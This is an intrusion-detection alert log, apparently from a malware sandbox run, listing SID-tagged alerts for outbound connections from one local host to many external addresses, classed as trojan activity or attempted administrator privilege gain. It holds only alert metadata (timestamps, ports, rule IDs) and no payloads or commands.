            Timestamp:192.168.2.23112.78.9.15551454802027121 10/23/22-17:58:02.812625
            SID:2027121
            Source Port:51454
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.247.28.22844288802846457 10/23/22-17:57:12.961320
            SID:2846457
            Source Port:44288
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.235.100.2034574372152835222 10/23/22-17:58:25.491294
            SID:2835222
            Source Port:34574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2370.62.230.25443020802841623 10/23/22-17:57:38.477263
            SID:2841623
            Source Port:43020
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.91.57.13353534802846380 10/23/22-17:57:49.444577
            SID:2846380
            Source Port:53534
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.20.128.24645532802846457 10/23/22-17:57:28.759047
            SID:2846457
            Source Port:45532
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.190.16.11438428802846457 10/23/22-17:58:17.705299
            SID:2846457
            Source Port:38428
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.151.74.557974802027121 10/23/22-17:58:32.661088
            SID:2027121
            Source Port:57974
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.135.201.18656190802846457 10/23/22-17:57:46.216250
            SID:2846457
            Source Port:56190
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.208.2.4834616802027121 10/23/22-17:57:06.711974
            SID:2027121
            Source Port:34616
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.188.122.11736648802846380 10/23/22-17:56:42.722999
            SID:2846380
            Source Port:36648
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23196.19.249.16953812802835222 10/23/22-17:58:16.933581
            SID:2835222
            Source Port:53812
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.86.82.4552262802027121 10/23/22-17:58:07.304334
            SID:2027121
            Source Port:52262
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.238.168.11450466802846380 10/23/22-17:58:00.630977
            SID:2846380
            Source Port:50466
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.166.117.18433878802846457 10/23/22-17:58:17.659416
            SID:2846457
            Source Port:33878
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2323.35.133.10237012802841623 10/23/22-17:56:56.766335
            SID:2841623
            Source Port:37012
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.202.20056096802027121 10/23/22-17:57:28.450964
            SID:2027121
            Source Port:56096
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.61.47.20333656802846380 10/23/22-17:57:30.241373
            SID:2846380
            Source Port:33656
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23104.31.16.2645474802841623 10/23/22-17:57:50.366666
            SID:2841623
            Source Port:45474
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.151.32.8549864802846457 10/23/22-17:56:48.706143
            SID:2846457
            Source Port:49864
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.166.123.1049164802846457 10/23/22-17:58:07.917483
            SID:2846457
            Source Port:49164
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23104.73.253.357436802841623 10/23/22-17:57:50.871792
            SID:2841623
            Source Port:57436
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.42.150.24234768802846457 10/23/22-17:57:56.402207
            SID:2846457
            Source Port:34768
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.143.8.6560930802846457 10/23/22-17:57:31.334102
            SID:2846457
            Source Port:60930
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.201.156.23847968802846457 10/23/22-17:57:56.420539
            SID:2846457
            Source Port:47968
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.54.50.9157074802846457 10/23/22-17:58:08.054624
            SID:2846457
            Source Port:57074
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.102.123.4041636802027121 10/23/22-17:57:16.166579
            SID:2027121
            Source Port:41636
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.226.189.7956548528692027339 10/23/22-17:58:20.278104
            SID:2027339
            Source Port:56548
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.176.29.460688802846380 10/23/22-17:56:39.254984
            SID:2846380
            Source Port:60688
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.19.152.2144438802846380 10/23/22-17:56:49.729037
            SID:2846380
            Source Port:44438
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.88.17.6541946802846380 10/23/22-17:58:22.587044
            SID:2846380
            Source Port:41946
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.2.211.22535232802846380 10/23/22-17:57:38.245828
            SID:2846380
            Source Port:35232
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.158.35.1104346875472023548 10/23/22-17:58:35.885954
            SID:2023548
            Source Port:43468
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2351.158.116.10236820802841623 10/23/22-17:57:46.500681
            SID:2841623
            Source Port:36820
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.54.46.25157992802027121 10/23/22-17:58:39.781212
            SID:2027121
            Source Port:57992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.100.117.19057736802027121 10/23/22-17:58:36.363743
            SID:2027121
            Source Port:57736
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.47.1133798802027121 10/23/22-17:57:52.080681
            SID:2027121
            Source Port:33798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.45.209.20759048802846380 10/23/22-17:58:06.234668
            SID:2846380
            Source Port:59048
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.161.93.350864802846380 10/23/22-17:57:49.051294
            SID:2846380
            Source Port:50864
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.213.237.2453750802027121 10/23/22-17:57:23.629839
            SID:2027121
            Source Port:53750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2354.217.124.4532912802841623 10/23/22-17:58:21.159984
            SID:2841623
            Source Port:32912
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.67.21751706802027121 10/23/22-17:58:30.344491
            SID:2027121
            Source Port:51706
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.7.43.13444516802846380 10/23/22-17:57:43.654408
            SID:2846380
            Source Port:44516
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23130.61.83.10437496802841623 10/23/22-17:57:50.384084
            SID:2841623
            Source Port:37496
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2378.47.26.11738060802846457 10/23/22-17:57:46.265474
            SID:2846457
            Source Port:38060
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.25.13.18053442802846457 10/23/22-17:57:00.255801
            SID:2846457
            Source Port:53442
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.217.234.17857844802027121 10/23/22-17:57:40.691991
            SID:2027121
            Source Port:57844
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23169.61.86.9237662802846380 10/23/22-17:58:30.957152
            SID:2846380
            Source Port:37662
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.212.60.3251026802027121 10/23/22-17:57:31.198621
            SID:2027121
            Source Port:51026
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.47.207.15747252802846380 10/23/22-17:57:51.852323
            SID:2846380
            Source Port:47252
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.254.33.11235616372152835222 10/23/22-17:58:32.625173
            SID:2835222
            Source Port:35616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.191.752610802027121 10/23/22-17:57:25.813902
            SID:2027121
            Source Port:52610
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.189.140.1350494802846380 10/23/22-17:56:59.862386
            SID:2846380
            Source Port:50494
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.169.253.21045966802027121 10/23/22-17:57:31.157232
            SID:2027121
            Source Port:45966
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.211.234.10458442802846380 10/23/22-17:57:51.859098
            SID:2846380
            Source Port:58442
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.53.43.12942708802846380 10/23/22-17:57:57.993551
            SID:2846380
            Source Port:42708
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.172.190.4245672802846457 10/23/22-17:57:35.635252
            SID:2846457
            Source Port:45672
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.20.177.9946006802027121 10/23/22-17:57:52.341639
            SID:2027121
            Source Port:46006
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.161.86.359276802846457 10/23/22-17:57:35.772864
            SID:2846457
            Source Port:59276
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23110.47.103.12055096802846457 10/23/22-17:57:43.839397
            SID:2846457
            Source Port:55096
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.18.102.13338190802846457 10/23/22-17:57:50.334993
            SID:2846457
            Source Port:38190
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.216.96.21756718802027121 10/23/22-17:58:19.650206
            SID:2027121
            Source Port:56718
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23195.164.254.22945368528692027339 10/23/22-17:58:30.472740
            SID:2027339
            Source Port:45368
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23195.20.46.13146474802846457 10/23/22-17:58:21.665596
            SID:2846457
            Source Port:46474
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.86.69.17139182802027121 10/23/22-17:57:54.677535
            SID:2027121
            Source Port:39182
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.155.165.12139624802846457 10/23/22-17:57:26.313775
            SID:2846457
            Source Port:39624
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.167.137.18938136802846380 10/23/22-17:57:48.493673
            SID:2846380
            Source Port:38136
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.114.139.23358202802846457 10/23/22-17:58:26.388315
            SID:2846457
            Source Port:58202
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.165.11249852802027121 10/23/22-17:58:36.299989
            SID:2027121
            Source Port:49852
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.163.177.21559226802846380 10/23/22-17:58:06.170271
            SID:2846380
            Source Port:59226
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.14.206.22454522802846457 10/23/22-17:57:09.752560
            SID:2846457
            Source Port:54522
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.127.57.13545708802846380 10/23/22-17:58:01.205229
            SID:2846380
            Source Port:45708
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.196.32.2848108802846380 10/23/22-17:58:25.093178
            SID:2846380
            Source Port:48108
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2378.186.147.22852716802846457 10/23/22-17:57:46.335397
            SID:2846457
            Source Port:52716
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.246.3.18356212802846457 10/23/22-17:57:41.270857
            SID:2846457
            Source Port:56212
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2387.241.135.851746802841623 10/23/22-17:57:01.193468
            SID:2841623
            Source Port:51746
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23185.10.158.2156654802835221 10/23/22-17:56:51.489662
            SID:2835221
            Source Port:56654
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.73.244.3137048802846380 10/23/22-17:56:55.338953
            SID:2846380
            Source Port:37048
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23186.78.174.7339924802841623 10/23/22-17:58:29.701765
            SID:2841623
            Source Port:39924
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.95.201.15037332802846457 10/23/22-17:58:33.030575
            SID:2846457
            Source Port:37332
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.166.65.12949916802846457 10/23/22-17:58:07.918432
            SID:2846457
            Source Port:49916
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.187.128.10643334802846457 10/23/22-17:57:31.303881
            SID:2846457
            Source Port:43334
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.88.229.24157376802846380 10/23/22-17:58:16.958982
            SID:2846380
            Source Port:57376
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.226.18053890802027121 10/23/22-17:57:57.707113
            SID:2027121
            Source Port:53890
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.228.228.16142622802846457 10/23/22-17:57:18.503458
            SID:2846457
            Source Port:42622
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.85.76.25540500802846457 10/23/22-17:57:55.922977
            SID:2846457
            Source Port:40500
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.232.8.23949162802846380 10/23/22-17:56:39.207770
            SID:2846380
            Source Port:49162
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.153.224.2834292802027121 10/23/22-17:58:07.443694
            SID:2027121
            Source Port:34292
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2344.241.137.22341180802841623 10/23/22-17:57:35.559879
            SID:2841623
            Source Port:41180
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23142.252.140.22739146802841623 10/23/22-17:57:12.578454
            SID:2841623
            Source Port:39146
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.213.158.10644822802027121 10/23/22-17:57:28.484723
            SID:2027121
            Source Port:44822
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.235.229.2936324802846380 10/23/22-17:56:39.153991
            SID:2846380
            Source Port:36324
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.10.34.6633618802846457 10/23/22-17:57:46.289400
            SID:2846457
            Source Port:33618
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.209.202.25049224802027121 10/23/22-17:57:31.417504
            SID:2027121
            Source Port:49224
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23176.235.113.11547138802841623 10/23/22-17:58:11.353459
            SID:2841623
            Source Port:47138
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.23.25.17359214802846457 10/23/22-17:57:58.561599
            SID:2846457
            Source Port:59214
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.71.190.2643940802846380 10/23/22-17:57:13.975978
            SID:2846380
            Source Port:43940
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.199.104.13443130802846380 10/23/22-17:58:35.754031
            SID:2846380
            Source Port:43130
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.173.11.14842778802027121 10/23/22-17:58:12.779990
            SID:2027121
            Source Port:42778
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.94.55.2045878802846380 10/23/22-17:58:29.784461
            SID:2846380
            Source Port:45878
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.213.12.10237264802841623 10/23/22-17:58:14.113045
            SID:2841623
            Source Port:37264
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.138.172.845622802846380 10/23/22-17:57:07.231449
            SID:2846380
            Source Port:45622
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.129.74.6348334802846380 10/23/22-17:57:01.329005
            SID:2846380
            Source Port:48334
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.70.28.21247484802027121 10/23/22-17:56:58.725651
            SID:2027121
            Source Port:47484
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.124.157.6442232802027121 10/23/22-17:57:07.684407
            SID:2027121
            Source Port:42232
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.74.216.8344712802846457 10/23/22-17:57:53.450782
            SID:2846457
            Source Port:44712
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2374.97.189.4743448802835222 10/23/22-17:58:16.624285
            SID:2835222
            Source Port:43448
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.15.46.1443130802846457 10/23/22-17:56:43.315056
            SID:2846457
            Source Port:43130
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.97.144.8934164802027121 10/23/22-17:57:02.482831
            SID:2027121
            Source Port:34164
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23164.155.153.4332818528692027339 10/23/22-17:57:55.998248
            SID:2027339
            Source Port:32818
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.87.12.12556206802027121 10/23/22-17:57:02.495037
            SID:2027121
            Source Port:56206
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.135.83.3034560802846457 10/23/22-17:57:26.414141
            SID:2846457
            Source Port:34560
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.183.92.24255824802846380 10/23/22-17:57:09.503462
            SID:2846380
            Source Port:55824
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.119.109.18947874802846380 10/23/22-17:57:03.553442
            SID:2846380
            Source Port:47874
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.254.71.21750546802846457 10/23/22-17:57:09.694375
            SID:2846457
            Source Port:50546
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.201.125.4337294802846457 10/23/22-17:56:43.200594
            SID:2846457
            Source Port:37294
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.244.197.338410802841623 10/23/22-17:58:21.114648
            SID:2841623
            Source Port:38410
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.201.236.5746022802846457 10/23/22-17:57:59.908703
            SID:2846457
            Source Port:46022
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.74.216.14660594802027121 10/23/22-17:56:41.486203
            SID:2027121
            Source Port:60594
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.214.181.1350726802027121 10/23/22-17:57:49.347734
            SID:2027121
            Source Port:50726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23197.242.150.8545212802841623 10/23/22-17:57:12.916299
            SID:2841623
            Source Port:45212
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.74.189.17540278802027121 10/23/22-17:56:46.365079
            SID:2027121
            Source Port:40278
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.52.121.1443112802846380 10/23/22-17:57:03.630757
            SID:2846380
            Source Port:43112
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.157.18141296802027121 10/23/22-17:57:45.098634
            SID:2027121
            Source Port:41296
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.211.102.10938970802846380 10/23/22-17:57:37.960194
            SID:2846380
            Source Port:38970
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.126.72.3349028802027121 10/23/22-17:58:27.406524
            SID:2027121
            Source Port:49028
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.32.71.16941058802846380 10/23/22-17:58:33.195867
            SID:2846380
            Source Port:41058
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.26.124.21336646802846457 10/23/22-17:57:28.829529
            SID:2846457
            Source Port:36646
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23169.50.35.10149620802846380 10/23/22-17:57:51.801270
            SID:2846380
            Source Port:49620
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.215.98.14537062802846457 10/23/22-17:58:17.685151
            SID:2846457
            Source Port:37062
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.252.186.13651966802846457 10/23/22-17:58:32.895297
            SID:2846457
            Source Port:51966
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2372.32.131.2447166802835221 10/23/22-17:57:11.261983
            SID:2835221
            Source Port:47166
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.129.56.21134566802027121 10/23/22-17:56:48.866949
            SID:2027121
            Source Port:34566
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2378.47.162.14935934802846457 10/23/22-17:58:28.628955
            SID:2846457
            Source Port:35934
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.158.44.20243626802846380 10/23/22-17:58:29.776670
            SID:2846380
            Source Port:43626
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.150.200.3543292802846457 10/23/22-17:58:15.388171
            SID:2846457
            Source Port:43292
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.139.18558198802027121 10/23/22-17:57:31.276613
            SID:2027121
            Source Port:58198
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.239.171.17342144802846380 10/23/22-17:57:27.966144
            SID:2846380
            Source Port:42144
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.211.106.4541256802027121 10/23/22-17:57:18.686379
            SID:2027121
            Source Port:41256
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.87.64.9744086802027121 10/23/22-17:57:40.846678
            SID:2027121
            Source Port:44086
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.221.24.6535450802027121 10/23/22-17:58:10.574728
            SID:2027121
            Source Port:35450
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.247.76.23345032802846380 10/23/22-17:57:43.270523
            SID:2846380
            Source Port:45032
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.90.69.25534610802846380 10/23/22-17:57:55.499865
            SID:2846380
            Source Port:34610
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.76.255.10347538802846457 10/23/22-17:57:53.428860
            SID:2846457
            Source Port:47538
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.90.66.2074959875472835222 10/23/22-17:58:16.541329
            SID:2835222
            Source Port:49598
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.7.151.1646196528692027339 10/23/22-17:57:20.233975
            SID:2027339
            Source Port:46196
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.124.21.5545122802027121 10/23/22-17:57:31.198551
            SID:2027121
            Source Port:45122
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23164.155.235.16435986528692027339 10/23/22-17:58:36.207823
            SID:2027339
            Source Port:35986
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.128.80.5643252802846457 10/23/22-17:56:43.243891
            SID:2846457
            Source Port:43252
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2378.140.134.18732774802846457 10/23/22-17:58:04.229718
            SID:2846457
            Source Port:32774
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.85.43.23150884802027121 10/23/22-17:58:37.404942
            SID:2027121
            Source Port:50884
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2383.23.75.1352542802846380 10/23/22-17:58:30.980025
            SID:2846380
            Source Port:52542
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.10.80.11257334802846380 10/23/22-17:56:42.732402
            SID:2846380
